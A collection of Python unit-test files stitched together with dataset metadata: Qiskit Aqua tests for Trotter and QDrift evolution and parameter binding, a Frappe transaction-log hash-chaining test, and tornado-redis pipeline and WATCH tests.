    def test_parameterized_evolution(self):
        """ parameterized evolution test """
        thetas = ParameterVector('θ', length=7)
        op = (thetas[0] * I ^ I) + \
            (thetas[1] * I ^ Z) + \
            (thetas[2] * X ^ X) + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z) + \
            (thetas[5] * Z ^ Z)
        op = op * thetas[6]
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        mean = evolution.convert(wf)
        circuit_params = mean.to_circuit().parameters
        # Check that the non-identity parameters are in the circuit;
        # thetas[0] multiplies I^I and produces only a global phase.
        for p in thetas[1:]:
            self.assertIn(p, circuit_params)
        self.assertNotIn(thetas[0], circuit_params)
    def test_bind_parameters(self):
        """ bind parameters test """
        thetas = ParameterVector('θ', length=6)
        op = (thetas[1] * I ^ Z) + \
            (thetas[2] * X ^ X) + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z) + \
            (thetas[5] * Z ^ Z)
        op = thetas[0] * op
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        wf = wf.assign_parameters({thetas: np.arange(10, 16)})
        mean = evolution.convert(wf)
        circuit_params = mean.to_circuit().parameters
        # Check that no bound parameters remain in the circuit
        for p in thetas[1:]:
            self.assertNotIn(p, circuit_params)
    def test_bind_circuit_parameters(self):
        """ bind circuit parameters test """
        thetas = ParameterVector('θ', length=6)
        op = (thetas[1] * I ^ Z) + \
            (thetas[2] * X ^ X) + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z) + \
            (thetas[5] * Z ^ Z)
        op = thetas[0] * op
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        evo = evolution.convert(wf)
        # Binding here happens AFTER conversion, on the converted op.
        mean = evo.assign_parameters({thetas: np.arange(10, 16)})
        # Check that no bound parameters remain in the circuit
        for p in thetas[1:]:
            self.assertNotIn(p, mean.to_circuit().parameters)
        # Check that original circuit is unchanged
        for p in thetas:
            self.assertIn(p, evo.to_circuit().parameters)
    # TODO test with other Op types than CircuitStateFn
    def test_bind_parameter_list(self):
        """ bind parameters list test """
        thetas = ParameterVector('θ', length=6)
        op = (thetas[1] * I ^ Z) + \
            (thetas[2] * X ^ X) + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z) + \
            (thetas[5] * Z ^ Z)
        op = thetas[0] * op
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        evo = evolution.convert(wf)
        # Three value sets per parameter -> binding yields a ListOp of
        # three bound circuits.
        param_list = np.transpose([np.arange(10, 16), np.arange(2, 8), np.arange(30, 36)]).tolist()
        means = evo.assign_parameters({thetas: param_list})
        self.assertIsInstance(means, ListOp)
        # Check that no bound parameters remain in any of the circuits
        for p in thetas[1:]:
            for circop in means.oplist:
                self.assertNotIn(p, circop.to_circuit().parameters)
        # Check that original circuit is unchanged
        for p in thetas:
            self.assertIn(p, evo.to_circuit().parameters)
    def test_qdrift(self):
        """ QDrift test """
        op = (2 * Z ^ Z) + (3 * X ^ X) - (4 * Y ^ Y) + (.5 * Z ^ I)
        trotterization = QDrift().convert(op)
        self.assertGreater(len(trotterization.oplist), 150)
        last_coeff = None
        # Check that all types are correct and all coefficients are equal.
        # NOTE(review): `if last_coeff:` would also reset on a coefficient
        # of 0; fine here since QDrift coefficients are non-zero.
        for op in trotterization.oplist:
            self.assertIsInstance(op, (EvolvedOp, CircuitOp))
            if isinstance(op, EvolvedOp):
                if last_coeff:
                    self.assertEqual(op.primitive.coeff, last_coeff)
                else:
                    last_coeff = op.primitive.coeff
    def test_matrix_op_evolution(self):
        """ MatrixOp evolution test """
        # pylint: disable=no-member
        op = (-1.052373245772859 * I ^ I) + \
            (0.39793742484318045 * I ^ Z) + \
            (0.18093119978423156 * X ^ X) + \
            (-0.39793742484318045 * Z ^ I) + \
            (-0.01128010425623538 * Z ^ Z) * np.pi/2
        # exp_i() of a MatrixOp must equal scipy's matrix exponential.
        exp_mat = op.to_matrix_op().exp_i().to_matrix()
        ref_mat = scipy.linalg.expm(-1j * op.to_matrix())
        np.testing.assert_array_almost_equal(ref_mat, exp_mat)
    def test_log_i(self):
        """ MatrixOp.log_i() test """
        op = (-1.052373245772859 * I ^ I) + \
            (0.39793742484318045 * I ^ Z) + \
            (0.18093119978423156 * X ^ X) + \
            (-0.39793742484318045 * Z ^ I) + \
            (-0.01128010425623538 * Z ^ Z) * np.pi/2
        # In every variant, log_i(exp_i(op)) must recover op.
        # Test with CircuitOp
        log_exp_op = op.to_matrix_op().exp_i().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
        # Test with MatrixOp
        log_exp_op = op.to_matrix_op().exp_i().to_matrix_op().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
        # Test with PauliOp
        log_exp_op = op.to_matrix_op().exp_i().to_pauli_op().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
        # Test with EvolvedOp
        log_exp_op = op.exp_i().to_pauli_op().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
        # Test with proper ListOp
        op = ListOp([(0.39793742484318045 * I ^ Z),
                     (0.18093119978423156 * X ^ X),
                     (-0.39793742484318045 * Z ^ I),
                     (-0.01128010425623538 * Z ^ Z) * np.pi / 2])
        log_exp_op = op.to_matrix_op().exp_i().to_matrix_op().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
    def test_matrix_op_parameterized_evolution(self):
        """ parameterized MatrixOp evolution test """
        # pylint: disable=no-member
        theta = Parameter('θ')
        op = (-1.052373245772859 * I ^ I) + \
            (0.39793742484318045 * I ^ Z) + \
            (0.18093119978423156 * X ^ X) + \
            (-0.39793742484318045 * Z ^ I) + \
            (-0.01128010425623538 * Z ^ Z)
        op = op * theta
        wf = (op.to_matrix_op().exp_i()) @ CX @ (H ^ I) @ Zero
        self.assertIn(theta, wf.to_circuit().parameters)
        op = op.assign_parameters({theta: 1})
        exp_mat = op.to_matrix_op().exp_i().to_matrix()
        ref_mat = scipy.linalg.expm(-1j * op.to_matrix())
        np.testing.assert_array_almost_equal(ref_mat, exp_mat)
        wf = wf.assign_parameters({theta: 3})
        self.assertNotIn(theta, wf.to_circuit().parameters)
    def test_mixed_evolution(self):
        """ bind parameters test with mixed primitive types """
        thetas = ParameterVector('θ', length=6)
        # Terms deliberately mix MatrixOp, PauliOp and CircuitOp primitives.
        op = (thetas[1] * (I ^ Z).to_matrix_op()) + \
            (thetas[2] * (X ^ X)).to_matrix_op() + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z).to_circuit_op() + \
            (thetas[5] * (Z ^ I).to_circuit_op())
        op = thetas[0] * op
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        wf = wf.assign_parameters({thetas: np.arange(10, 16)})
        mean = evolution.convert(wf)
        circuit_params = mean.to_circuit().parameters
        # Check that no bound parameters remain in the circuit
        for p in thetas[1:]:
            self.assertNotIn(p, circuit_params)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Evolution """
import unittest
from test.aqua import QiskitAquaTestCase
import numpy as np
import scipy.linalg
import qiskit
from qiskit.circuit import ParameterVector, Parameter
from qiskit.aqua.operators import (X, Y, Z, I, CX, H, ListOp, CircuitOp, Zero, EvolutionFactory,
EvolvedOp, PauliTrotterEvolution, QDrift)
# pylint: disable=invalid-name
class TestEvolution(QiskitAquaTestCase):
    """Evolution tests: Trotterization, QDrift and parameter binding."""
    def test_exp_i(self):
        """ exponential of Pauli test """
        op = Z.exp_i()
        # exp(-iZ) compiles to a single RZ rotation with angle 2.
        gate = op.to_circuit().data[0][0]
        self.assertIsInstance(gate, qiskit.circuit.library.RZGate)
        self.assertEqual(gate.params[0], 2)
    def test_trotter_with_identity(self):
        """ trotterization of operator with identity term """
        op = (2.0 * I ^ I) + (Z ^ Y)
        # Reference: exact matrix exponential of the full operator.
        exact_matrix = scipy.linalg.expm(-1j * op.to_matrix())
        evo = PauliTrotterEvolution(trotter_mode='suzuki', reps=2)
        with self.subTest('all PauliOp terms'):
            circ_op = evo.convert(EvolvedOp(op))
            circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
            np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
        with self.subTest('MatrixOp identity term'):
            op = (2.0 * I ^ I).to_matrix_op() + (Z ^ Y)
            circ_op = evo.convert(EvolvedOp(op))
            circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
            np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
        with self.subTest('CircuitOp identity term'):
            op = (2.0 * I ^ I).to_circuit_op() + (Z ^ Y)
            circ_op = evo.convert(EvolvedOp(op))
            circuit_matrix = qiskit.quantum_info.Operator(circ_op.to_circuit()).data
            np.testing.assert_array_almost_equal(exact_matrix, circuit_matrix)
    def test_pauli_evolution(self):
        """ pauli evolution test """
        op = (-1.052373245772859 * I ^ I) + \
            (0.39793742484318045 * I ^ Z) + \
            (0.18093119978423156 * X ^ X) + \
            (-0.39793742484318045 * Z ^ I) + \
            (-0.01128010425623538 * Z ^ Z)
        evolution = EvolutionFactory.build(operator=op)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = ((np.pi / 2) * op).exp_i() @ CX @ (H ^ I) @ Zero
        # Only a smoke test: conversion must succeed and return something.
        mean = evolution.convert(wf)
        self.assertIsNotNone(mean)
    def test_parameterized_evolution(self):
        """ parameterized evolution test """
        thetas = ParameterVector('θ', length=7)
        op = (thetas[0] * I ^ I) + \
            (thetas[1] * I ^ Z) + \
            (thetas[2] * X ^ X) + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z) + \
            (thetas[5] * Z ^ Z)
        op = op * thetas[6]
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        mean = evolution.convert(wf)
        circuit_params = mean.to_circuit().parameters
        # Check that the non-identity parameters are in the circuit;
        # thetas[0] multiplies I^I and produces only a global phase.
        for p in thetas[1:]:
            self.assertIn(p, circuit_params)
        self.assertNotIn(thetas[0], circuit_params)
    def test_bind_parameters(self):
        """ bind parameters test """
        thetas = ParameterVector('θ', length=6)
        op = (thetas[1] * I ^ Z) + \
            (thetas[2] * X ^ X) + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z) + \
            (thetas[5] * Z ^ Z)
        op = thetas[0] * op
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        wf = wf.assign_parameters({thetas: np.arange(10, 16)})
        mean = evolution.convert(wf)
        circuit_params = mean.to_circuit().parameters
        # Check that no bound parameters remain in the circuit
        for p in thetas[1:]:
            self.assertNotIn(p, circuit_params)
    def test_bind_circuit_parameters(self):
        """ bind circuit parameters test """
        thetas = ParameterVector('θ', length=6)
        op = (thetas[1] * I ^ Z) + \
            (thetas[2] * X ^ X) + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z) + \
            (thetas[5] * Z ^ Z)
        op = thetas[0] * op
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        evo = evolution.convert(wf)
        # Binding here happens AFTER conversion, on the converted op.
        mean = evo.assign_parameters({thetas: np.arange(10, 16)})
        # Check that no bound parameters remain in the circuit
        for p in thetas[1:]:
            self.assertNotIn(p, mean.to_circuit().parameters)
        # Check that original circuit is unchanged
        for p in thetas:
            self.assertIn(p, evo.to_circuit().parameters)
    # TODO test with other Op types than CircuitStateFn
    def test_bind_parameter_list(self):
        """ bind parameters list test """
        thetas = ParameterVector('θ', length=6)
        op = (thetas[1] * I ^ Z) + \
            (thetas[2] * X ^ X) + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z) + \
            (thetas[5] * Z ^ Z)
        op = thetas[0] * op
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        evo = evolution.convert(wf)
        # Three value sets per parameter -> binding yields a ListOp of
        # three bound circuits.
        param_list = np.transpose([np.arange(10, 16), np.arange(2, 8), np.arange(30, 36)]).tolist()
        means = evo.assign_parameters({thetas: param_list})
        self.assertIsInstance(means, ListOp)
        # Check that no bound parameters remain in any of the circuits
        for p in thetas[1:]:
            for circop in means.oplist:
                self.assertNotIn(p, circop.to_circuit().parameters)
        # Check that original circuit is unchanged
        for p in thetas:
            self.assertIn(p, evo.to_circuit().parameters)
    def test_qdrift(self):
        """ QDrift test """
        op = (2 * Z ^ Z) + (3 * X ^ X) - (4 * Y ^ Y) + (.5 * Z ^ I)
        trotterization = QDrift().convert(op)
        self.assertGreater(len(trotterization.oplist), 150)
        last_coeff = None
        # Check that all types are correct and all coefficients are equal.
        # NOTE(review): `if last_coeff:` would also reset on a coefficient
        # of 0; fine here since QDrift coefficients are non-zero.
        for op in trotterization.oplist:
            self.assertIsInstance(op, (EvolvedOp, CircuitOp))
            if isinstance(op, EvolvedOp):
                if last_coeff:
                    self.assertEqual(op.primitive.coeff, last_coeff)
                else:
                    last_coeff = op.primitive.coeff
    def test_matrix_op_evolution(self):
        """ MatrixOp evolution test """
        # pylint: disable=no-member
        op = (-1.052373245772859 * I ^ I) + \
            (0.39793742484318045 * I ^ Z) + \
            (0.18093119978423156 * X ^ X) + \
            (-0.39793742484318045 * Z ^ I) + \
            (-0.01128010425623538 * Z ^ Z) * np.pi/2
        # exp_i() of a MatrixOp must equal scipy's matrix exponential.
        exp_mat = op.to_matrix_op().exp_i().to_matrix()
        ref_mat = scipy.linalg.expm(-1j * op.to_matrix())
        np.testing.assert_array_almost_equal(ref_mat, exp_mat)
    def test_log_i(self):
        """ MatrixOp.log_i() test """
        op = (-1.052373245772859 * I ^ I) + \
            (0.39793742484318045 * I ^ Z) + \
            (0.18093119978423156 * X ^ X) + \
            (-0.39793742484318045 * Z ^ I) + \
            (-0.01128010425623538 * Z ^ Z) * np.pi/2
        # In every variant, log_i(exp_i(op)) must recover op.
        # Test with CircuitOp
        log_exp_op = op.to_matrix_op().exp_i().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
        # Test with MatrixOp
        log_exp_op = op.to_matrix_op().exp_i().to_matrix_op().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
        # Test with PauliOp
        log_exp_op = op.to_matrix_op().exp_i().to_pauli_op().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
        # Test with EvolvedOp
        log_exp_op = op.exp_i().to_pauli_op().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
        # Test with proper ListOp
        op = ListOp([(0.39793742484318045 * I ^ Z),
                     (0.18093119978423156 * X ^ X),
                     (-0.39793742484318045 * Z ^ I),
                     (-0.01128010425623538 * Z ^ Z) * np.pi / 2])
        log_exp_op = op.to_matrix_op().exp_i().to_matrix_op().log_i().to_pauli_op()
        np.testing.assert_array_almost_equal(op.to_matrix(), log_exp_op.to_matrix())
    def test_matrix_op_parameterized_evolution(self):
        """ parameterized MatrixOp evolution test """
        # pylint: disable=no-member
        theta = Parameter('θ')
        op = (-1.052373245772859 * I ^ I) + \
            (0.39793742484318045 * I ^ Z) + \
            (0.18093119978423156 * X ^ X) + \
            (-0.39793742484318045 * Z ^ I) + \
            (-0.01128010425623538 * Z ^ Z)
        op = op * theta
        wf = (op.to_matrix_op().exp_i()) @ CX @ (H ^ I) @ Zero
        self.assertIn(theta, wf.to_circuit().parameters)
        op = op.assign_parameters({theta: 1})
        exp_mat = op.to_matrix_op().exp_i().to_matrix()
        ref_mat = scipy.linalg.expm(-1j * op.to_matrix())
        np.testing.assert_array_almost_equal(ref_mat, exp_mat)
        wf = wf.assign_parameters({theta: 3})
        self.assertNotIn(theta, wf.to_circuit().parameters)
    def test_mixed_evolution(self):
        """ bind parameters test with mixed primitive types """
        thetas = ParameterVector('θ', length=6)
        # Terms deliberately mix MatrixOp, PauliOp and CircuitOp primitives.
        op = (thetas[1] * (I ^ Z).to_matrix_op()) + \
            (thetas[2] * (X ^ X)).to_matrix_op() + \
            (thetas[3] * Z ^ I) + \
            (thetas[4] * Y ^ Z).to_circuit_op() + \
            (thetas[5] * (Z ^ I).to_circuit_op())
        op = thetas[0] * op
        evolution = PauliTrotterEvolution(trotter_mode='trotter', reps=1)
        # wf = (Pl^Pl) + (Ze^Ze)
        wf = (op).exp_i() @ CX @ (H ^ I) @ Zero
        wf = wf.assign_parameters({thetas: np.arange(10, 16)})
        mean = evolution.convert(wf)
        circuit_params = mean.to_circuit().parameters
        # Check that no bound parameters remain in the circuit
        for p in thetas[1:]:
            self.assertNotIn(p, circuit_params)
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
|
en
| 0.739051
|
# This code is part of Qiskit. # # (C) Copyright IBM 2018, 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. Test Evolution # pylint: disable=invalid-name Evolution tests. exponential of Pauli test trotterization of operator with identity term pauli evolution test # wf = (Pl^Pl) + (Ze^Ze) parameterized evolution test # wf = (Pl^Pl) + (Ze^Ze) # Check that the non-identity parameters are in the circuit bind parameters test # wf = (Pl^Pl) + (Ze^Ze) # Check that the no parameters are in the circuit bind circuit parameters test # wf = (Pl^Pl) + (Ze^Ze) # Check that the no parameters are in the circuit # Check that original circuit is unchanged # TODO test with other Op types than CircuitStateFn bind parameters list test # wf = (Pl^Pl) + (Ze^Ze) # Check that the no parameters are in the circuit # Check that original circuit is unchanged QDrift test # Check that all types are correct and all coefficients are equals MatrixOp evolution test # pylint: disable=no-member MatrixOp.log_i() test # Test with CircuitOp # Test with MatrixOp # Test with PauliOp # Test with EvolvedOp # Test with proper ListOp parameterized MatrixOp evolution test # pylint: disable=no-member bind parameters test # wf = (Pl^Pl) + (Ze^Ze) # Check that the no parameters are in the circuit
| 1.99005
| 2
|
frappe/core/doctype/transaction_log/test_transaction_log.py
|
erpnext-tm/frappe
| 0
|
6627554
|
<filename>frappe/core/doctype/transaction_log/test_transaction_log.py
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe Technologies and Contributors
# See license.txt
from __future__ import unicode_literals
import hashlib
import unittest
import frappe
test_records = []
class TestTransactionLog(unittest.TestCase):
    def test_validate_chaining(self):
        """Verify the hash chain across consecutive Transaction Log rows.

        After inserting three logs, the third log's chaining_hash must
        equal sha256(third.transaction_hash + second.chaining_hash),
        i.e. each entry is cryptographically linked to its predecessor.
        """
        # First entry only anchors the chain; its handle is not needed.
        frappe.get_doc(
            {
                "doctype": "Transaction Log",
                "reference_doctype": "Test Doctype",
                "document_name": "Test Document 1",
                "data": "first_data",
            }
        ).insert(ignore_permissions=True)
        second_log = frappe.get_doc(
            {
                "doctype": "Transaction Log",
                "reference_doctype": "Test Doctype",
                "document_name": "Test Document 2",
                "data": "second_data",
            }
        ).insert(ignore_permissions=True)
        third_log = frappe.get_doc(
            {
                "doctype": "Transaction Log",
                "reference_doctype": "Test Doctype",
                "document_name": "Test Document 3",
                "data": "third_data",
            }
        ).insert(ignore_permissions=True)
        # Recompute the expected chaining hash for the third entry from
        # its own transaction hash plus the second entry's chaining hash.
        sha = hashlib.sha256()
        sha.update(
            frappe.safe_encode(str(third_log.transaction_hash))
            + frappe.safe_encode(str(second_log.chaining_hash))
        )
        self.assertEqual(sha.hexdigest(), third_log.chaining_hash)
|
<filename>frappe/core/doctype/transaction_log/test_transaction_log.py
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Frappe Technologies and Contributors
# See license.txt
from __future__ import unicode_literals
import hashlib
import unittest
import frappe
test_records = []
class TestTransactionLog(unittest.TestCase):
    def test_validate_chaining(self):
        """Verify the hash chain across consecutive Transaction Log rows.

        After inserting three logs, the third log's chaining_hash must
        equal sha256(third.transaction_hash + second.chaining_hash),
        i.e. each entry is cryptographically linked to its predecessor.
        """
        # First entry only anchors the chain; its handle is not needed.
        frappe.get_doc(
            {
                "doctype": "Transaction Log",
                "reference_doctype": "Test Doctype",
                "document_name": "Test Document 1",
                "data": "first_data",
            }
        ).insert(ignore_permissions=True)
        second_log = frappe.get_doc(
            {
                "doctype": "Transaction Log",
                "reference_doctype": "Test Doctype",
                "document_name": "Test Document 2",
                "data": "second_data",
            }
        ).insert(ignore_permissions=True)
        third_log = frappe.get_doc(
            {
                "doctype": "Transaction Log",
                "reference_doctype": "Test Doctype",
                "document_name": "Test Document 3",
                "data": "third_data",
            }
        ).insert(ignore_permissions=True)
        # Recompute the expected chaining hash for the third entry from
        # its own transaction hash plus the second entry's chaining hash.
        sha = hashlib.sha256()
        sha.update(
            frappe.safe_encode(str(third_log.transaction_hash))
            + frappe.safe_encode(str(second_log.chaining_hash))
        )
        self.assertEqual(sha.hexdigest(), third_log.chaining_hash)
|
en
| 0.718929
|
# -*- coding: utf-8 -*- # Copyright (c) 2018, Frappe Technologies and Contributors # See license.txt
| 2.203094
| 2
|
tornadoredis/tests/pipeline.py
|
jbochi/tornado-redis
| 1
|
6627555
|
#!/usr/bin/env python
from tornado import gen
from redistest import RedisTestCase, async_test
from tornadoredis.exceptions import ResponseError
class PipelineTestCase(RedisTestCase):
    """Tests for pipelined command batches, covering both plain pipelines
    and transactional (MULTI/EXEC) ones, interleaving with non-pipelined
    commands, and WATCH/UNWATCH semantics.
    """
    @async_test
    @gen.engine
    def test_pipe_simple(self):
        # Plain (non-transactional) pipeline: results come back in
        # submission order.
        pipe = self.client.pipeline()
        pipe.set('foo', '123')
        pipe.set('bar', '456')
        pipe.mget(('foo', 'bar'))
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [True, True, ['123', '456', ]])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_multi(self):
        # Same commands as test_pipe_simple but wrapped in MULTI/EXEC.
        pipe = self.client.pipeline(transactional=True)
        pipe.set('foo', '123')
        pipe.set('bar', '456')
        pipe.mget(('foo', 'bar'))
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [True, True, ['123', '456', ]])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_error(self):
        # A wrong-type command (RPOP on a set) yields a ResponseError in
        # its result slot without failing the whole pipeline.
        pipe = self.client.pipeline()
        pipe.sadd('foo', 1)
        pipe.sadd('foo', 2)
        pipe.rpop('foo')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res[:2], [1, 1])
        self.assertIsInstance(res[2], ResponseError)
        self.stop()
    @async_test
    @gen.engine
    def test_two_pipes(self):
        # A pipeline object is reusable after execute().
        pipe = self.client.pipeline()
        pipe.rpush('foo', '1')
        pipe.rpush('foo', '2')
        pipe.lrange('foo', 0, -1)
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [True, 2, ['1', '2']])
        pipe.sadd('bar', '3')
        pipe.sadd('bar', '4')
        pipe.smembers('bar')
        pipe.scard('bar')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [1, 1, set(['3', '4']), 2])
        self.stop()
    @async_test
    @gen.engine
    def test_mix_with_pipe(self):
        # Direct client commands may be interleaved with queueing
        # pipeline commands; the pipeline runs only on execute().
        pipe = self.client.pipeline()
        res = yield gen.Task(self.client.set, 'foo', '123')
        self.assertTrue(res)
        yield gen.Task(self.client.hmset, 'bar', {'zar': 'gza'},)
        pipe.get('foo')
        res = yield gen.Task(self.client.get, 'foo')
        self.assertEqual(res, '123')
        pipe.hgetall('bar')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, ['123', {'zar': 'gza'}])
        self.stop()
    @async_test
    @gen.engine
    def test_mix_with_pipe_multi(self):
        # Same interleaving as above, with a transactional pipeline.
        pipe = self.client.pipeline(transactional=True)
        res = yield gen.Task(self.client.set, 'foo', '123')
        self.assertTrue(res)
        yield gen.Task(self.client.hmset, 'bar', {'zar': 'gza'},)
        pipe.get('foo')
        res = yield gen.Task(self.client.get, 'foo')
        self.assertEqual(res, '123')
        pipe.hgetall('bar')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, ['123', {'zar': 'gza'}])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_watch(self):
        # Watched key 'foo' is untouched, so the transaction commits.
        res = yield gen.Task(self.client.watch, 'foo')
        self.assertTrue(res)
        res = yield gen.Task(self.client.set, 'bar', 'zar')
        self.assertTrue(res)
        pipe = self.client.pipeline(transactional=True)
        pipe.get('bar')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, ['zar', ])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_watch2(self):
        res = yield gen.Task(self.client.set, 'foo', 'bar')
        self.assertTrue(res)
        res = yield gen.Task(self.client.watch, 'foo')
        self.assertTrue(res)
        res = yield gen.Task(self.client.set, 'foo', 'zar')
        self.assertTrue(res)
        pipe = self.client.pipeline(transactional=True)
        pipe.get('foo')
        res = yield gen.Task(pipe.execute)
        # The watched key changed after WATCH, so EXEC aborts and the
        # pipeline returns no results.
        self.assertEqual(res, [])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_unwatch(self):
        res = yield gen.Task(self.client.set, 'foo', 'bar')
        self.assertTrue(res)
        res = yield gen.Task(self.client.watch, 'foo')
        self.assertTrue(res)
        res = yield gen.Task(self.client.set, 'foo', 'zar')
        self.assertTrue(res)
        # UNWATCH clears the watch, so the later EXEC is not aborted
        # even though 'foo' was modified.
        res = yield gen.Task(self.client.unwatch)
        self.assertTrue(res)
        pipe = self.client.pipeline(transactional=True)
        pipe.get('foo')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, ['zar'])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_zsets(self):
        # Sorted-set commands through a transactional pipeline.
        pipe = self.client.pipeline(transactional=True)
        pipe.zadd('foo', 1, 'a')
        pipe.zadd('foo', 2, 'b')
        pipe.zscore('foo', 'a')
        pipe.zscore('foo', 'b')
        pipe.zrank('foo', 'a',)
        pipe.zrank('foo', 'b',)
        pipe.zrange('foo', 0, -1, True)
        pipe.zrange('foo', 0, -1, False)
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [
            1, 1,
            1, 2,
            0, 1,
            [('a', 1.0), ('b', 2.0)],
            ['a', 'b'],
        ])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_zsets2(self):
        # Same sorted-set sequence without a transaction; results match.
        pipe = self.client.pipeline(transactional=False)
        pipe.zadd('foo', 1, 'a')
        pipe.zadd('foo', 2, 'b')
        pipe.zscore('foo', 'a')
        pipe.zscore('foo', 'b')
        pipe.zrank('foo', 'a',)
        pipe.zrank('foo', 'b',)
        pipe.zrange('foo', 0, -1, True)
        pipe.zrange('foo', 0, -1, False)
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [
            1, 1,
            1, 2,
            0, 1,
            [('a', 1.0), ('b', 2.0)],
            ['a', 'b'],
        ])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_hsets(self):
        # Hash commands through a transactional pipeline.
        pipe = self.client.pipeline(transactional=True)
        pipe.hset('foo', 'bar', 'aaa')
        pipe.hset('foo', 'zar', 'bbb')
        pipe.hgetall('foo')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [
            True,
            True,
            {'bar': 'aaa', 'zar': 'bbb'}
        ])
        self.stop()
    @async_test
    @gen.engine
    def test_pipe_hsets2(self):
        # Same hash sequence without a transaction; results match.
        pipe = self.client.pipeline(transactional=False)
        pipe.hset('foo', 'bar', 'aaa')
        pipe.hset('foo', 'zar', 'bbb')
        pipe.hgetall('foo')
        res = yield gen.Task(pipe.execute)
        self.assertEqual(res, [
            True,
            True,
            {'bar': 'aaa', 'zar': 'bbb'}
        ])
        self.stop()
    @async_test
    @gen.engine
    def test_response_error(self):
        # Outside of a pipeline, a wrong-type command also surfaces as a
        # ResponseError result rather than an exception.
        res = yield gen.Task(self.client.set, 'foo', 'bar')
        self.assertTrue(res)
        res = yield gen.Task(self.client.llen, 'foo')
        self.assertIsInstance(res, ResponseError)
        self.stop()
|
#!/usr/bin/env python
from tornado import gen
